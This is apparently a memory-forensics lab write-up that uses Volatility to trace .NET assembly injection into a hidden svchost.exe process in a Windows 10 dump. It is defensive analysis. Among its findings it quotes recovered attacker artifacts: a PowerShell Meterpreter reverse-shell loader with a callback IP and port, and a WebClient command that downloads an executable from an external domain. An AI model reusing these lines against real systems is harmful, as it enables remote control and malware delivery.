Volatility Memory Analysis: Hunting .NET Malware
Memory forensics exercise using Volatility to hunt for .NET malware, hidden processes, injected code, suspicious drivers, and Meterpreter/Mimikatz/Emotet indicators in a Windows 10 memory dump.
Overview
This exercise focuses on hunting for .NET malware inside a Windows 10 memory dump using Volatility with the Win10x64_18362 profile. The investigation covers process enumeration, network analysis, string analysis, YARA scanning, DLL inspection, and driver investigation to identify indicators of compromise including Meterpreter, Mimikatz, Emotet, and .NET assembly injection.
OSINT sources consulted: Volatility Command Reference wiki, mnin.blogspot (ktimer blog), Elastic Security Labs (.NET attack hunting), and various memory analysis tutorials.
Process Enumeration
The first step is to enumerate all running processes using multiple Volatility plugins to get a comprehensive view and identify discrepancies.
vol.py -f /path/memdump.mem --profile=Win10x64_18362 pslist
vol.py -f /path/memdump.mem --profile=Win10x64_18362 psscan
vol.py -f /path/memdump.mem --profile=Win10x64_18362 pstree
vol.py -f /path/memdump.mem --profile=Win10x64_18362 psxview
Key findings from process enumeration:
- An unusual process name appeared to be missing an alphanumeric character, which is common with memory analysis profile conflicts.
- MemCompression PID 1540 initiated in a non-standard order immediately after the System process with an unknown name.
- psxview revealed a critical finding: comparing PSTree to PSScan, svchost.exe PID 4524 was not present in PSTree, indicating the process was attempting to hide.
Network Analysis
Next, network connections were mapped to identify suspicious listening ports and outbound connections.
vol.py -f /path/memdump.mem --profile=Win10x64_18362 netscan
Findings:
- Unusual listening ports identified: 445 (SMB) and 5985 (WinRM, commonly leveraged by Meterpreter).
- Suspect Parent PIDs were mapped for unusual connections and port listening activity.
- External IPs were investigated for malicious outbound connections.
- No immediate evidence of process name masquerading was found at this stage.
Command Line Analysis
The cmdline plugin reveals the command-line arguments used to launch each process.
vol.py -f /path/memdump.mem --profile=Win10x64_18362 cmdline
Findings:
- Evidence of JIT (Just-In-Time) compilation typical of .NET environments was discovered.
- conhost.exe PID 548 was referencing identifier
0x4, which likely corresponds to PID 4 (SYSTEM).
\??\C:\WINDOWS\system32\conhost.exe 0x4
This relationship between conhost.exe and the SYSTEM process warranted further investigation.
String Analysis
Pivoting to string searches provided high-value intelligence on attacker tooling present in memory.
strings /path/memdump.dmp | find "Invoke-"
strings /path/memdump.dmp | find "Powershell.exe"
This immediately revealed indicators of Meterpreter, unusual PowerShell scripts, and Mimikatz activity.
Finding 1 — Meterpreter Payload
A PowerShell-based Meterpreter delivery mechanism was discovered in memory. The script was designed to hide the window, bypass execution policies, and download a reverse shell payload.
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ... Invoke-Shellcode -Payload windows/meterpreter/ -Lhost 52.41.122.38 -Lport 443
Key indicators:
-ExecutionPolicy Bypass— evading PowerShell restrictions-WindowStyle Hidden— operating without user visibilityInvoke-Shellcode— PowerSploit framework usage- Callback to
52.41.122.38on port443(HTTPS for C2 blending)
Finding 2 — Suspicious Java Strings
Mixed-context strings were found suggesting potential cross-platform exploitation or multi-stage payloads.
+0java/net/URLjava/lang/Runtimejava.io.tmpdirchmod 755CMD.exe /c startWindows\System32\WindowsPowershell
This artifact combines Java class references (java.net.URL, java.lang.Runtime) with OS command execution (chmod 755, CMD.exe /c start), which is indicative of OS command injection techniques. References: Microsoft secure coding guidelines, SANS OS command injection, OWASP Command Injection.
YARA Scanning
YARA rules were used to scan for .NET artifacts across all process memory spaces.
vol.py -f /path/memdump.mem --profile=Win10x64_18362 yarascan --yara-rules=".net"
Findings:
- MemCompression PID 1540 was found making connections with suspicious .NET behavior.
- Web connections pointed to executable downloads on external domains.
- Emotet signature identified (commonly used as a downloader/dropper).
Artifacts recovered (defanged):
.net.webclient downloadfile("http://ultimatepropertiesllc[.]com/ike.exe","$env:temp\bakdraw.exe")
200.63.45[.]105
181.174.166[.]137/sys/f4.exe
Additional indicators: Frospa.Backdoor, \wbem\ rundll32 execution.
Driver Investigation
The modules plugin lists all loaded kernel drivers.
vol.py -f /path/memdump.mem --profile=Win10x64_18362 modules
A suspicious .sys driver was found loaded from a temp directory:
C:\Users\<redacted>\AppData\Local\Temp\ad_driver.sys
Legitimate drivers are not loaded from user temp directories. Attackers commonly place drivers in temp paths for evasion, persistence, or privilege escalation.
Malfind & Timers
The malfind plugin identifies injected code regions within process memory (VAD regions with executable permissions that are not backed by a file on disk).
vol.py -f /path/memdump.mem --profile=Win10x64_18362 malfind
Injected memory regions detected:
| Process | PID | Injected Regions |
|---|---|---|
| svchost.exe | 4524 | 2 |
| MsMpEng.exe | 3208 | 5 |
| SearchUI.exe | 6776 | 2 |
| smartscreen.exe | 8444 | 1 |
PID 4524 (svchost.exe) was already flagged as hidden from PSTree, making the injected regions especially suspicious.
Timer analysis revealed a single Unknown process, which can indicate kernel anomalies, anti-forensic techniques, or hidden kernel modules.
Suspect Process Summary
Based on the investigation so far, the following processes were flagged for deeper analysis:
| PID | Process | Reason |
|---|---|---|
| 4 | SYSTEM | Referenced by conhost.exe PID 548 |
| 1540 | MemCompression | Non-standard startup order, .NET YARA hits |
| 4524 | svchost.exe | Hidden from PSTree, 2 injected regions |
| 548 | conhost.exe | Unusual reference to PID 4 SYSTEM |
DLL Analysis
DLL List
Attempting to list DLLs for the suspect processes:
vol.py -f /path/memdump.mem --profile=Win10x64_18362 dlllist -p 1540
vol.py -f /path/memdump.mem --profile=Win10x64_18362 dlllist -p 4
Both PID 1540 and PID 4 returned errors: Cannot load DLLs in process. This is expected for the SYSTEM process and MemCompression, but confirms these are not standard user-mode processes.
VAD Info — Base Addresses
The vadinfo plugin was used to inspect the Virtual Address Descriptor (VAD) tree for each suspect process.
vol.py -f /path/memdump.mem --profile=Win10x64_18362 vadinfo -p 1540
| PID | Process | Base Address |
|---|---|---|
| 1540 | MemCompression | 0x000001d6973c0000 |
| 4 | SYSTEM | 0x0000019e12e90000 |
| 4524 | svchost.exe | 0x000001b594540000 |
DLL Dump
Attempting to dump DLLs from PID 1540 and PID 4524:
Both returned e_magic 20A9, which is an invalid DOS signature. A normal PE file starts with 4D 5A (“MZ”). This indicates the memory regions do not contain standard PE executables, which is consistent with .NET managed code or injected shellcode.
LDR Modules
The ldrmodules plugin cross-references the three PEB module lists (InLoadOrderModuleList, InInitializationOrderModuleList, InMemoryOrderModuleList) to find discrepancies.
vol.py -f /path/memdump.mem --profile=Win10x64_18362 ldrmodules | findstr /I "false"
Findings:
- PID 548 (conhost.exe): unreadable format due to encoding issues.
- PID 4524 (svchost.exe): loading a DLL from a non-standard location:
\Users\<redacted>\Desktop\Release\AssemblyLoader.dll
AssemblyLoader.dll loaded from a user’s Desktop directory is a strong indicator of .NET assembly loader injection. This technique allows an attacker to load arbitrary .NET assemblies into a legitimate process.
.NET Framework DLLs in svchost.exe
Listing DLLs for PID 4524 revealed .NET Framework runtime libraries loaded into svchost.exe:
vol.py -f /path/memdump.mem --profile=Win10x64_18362 dlllist -p 4524
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll
- clr.dll — Common Language Runtime (the .NET execution engine)
- mscoreei.dll — .NET runtime shim/loader
- clrjit.dll — JIT compiler that converts .NET Intermediate Language (IL) to native machine code
svchost.exe is not normally associated with .NET execution. The presence of these DLLs confirms unauthorized .NET operations within this process.
Handle and String Analysis
Handles
vol.py -f /path/memdump.mem --profile=Win10x64_18362 handles -p 4524
Handle analysis confirmed the loading of AssemblyLoader.dll. PID 1540 (MemCompression) returned no additional results.
Strings on Process Dump
Dumping the process memory and searching for relevant strings provided further context.
strings 4524.dmp | findstr /I "conf"
Found references to machine.config in the .NET Framework directory. The machine.config file contains global .NET configuration settings and is accessed during .NET runtime initialization, further confirming active .NET execution within the process.
strings 4524.dmp | findstr /I "download"
Found references to .NET Framework 4.5 installer download URLs, indicating the process was interacting with .NET update or installation mechanisms.
Conclusion
The investigation confirmed that PID 4524 svchost.exe was the primary target of .NET malware injection:
- Process hiding — svchost.exe PID 4524 was absent from PSTree but present in PSScan, indicating active concealment.
- Assembly injection — AssemblyLoader.dll was loaded from a non-standard user directory (
\Desktop\Release\), enabling arbitrary .NET code execution. - .NET runtime loaded — The CLR (
clr.dll), JIT compiler (clrjit.dll), and runtime shim (mscoreei.dll) were all loaded into svchost.exe, which does not normally host .NET operations. - Configuration access — The process was interacting with
machine.config, confirming active .NET runtime initialization. - Invalid PE signatures — DLL dumps returned
e_magic 20A9instead of4D 5A, consistent with managed code or injected payloads rather than standard PE files. - Additional indicators — The broader memory dump contained evidence of Meterpreter reverse shells, Mimikatz usage, Emotet dropper activity, suspicious kernel drivers in temp directories, and OS command injection artifacts.
The collective evidence demonstrates that svchost.exe was exploited as a host for unauthorized .NET operations via assembly loader injection, a technique that leverages the legitimate .NET runtime to execute malicious managed code within a trusted Windows process.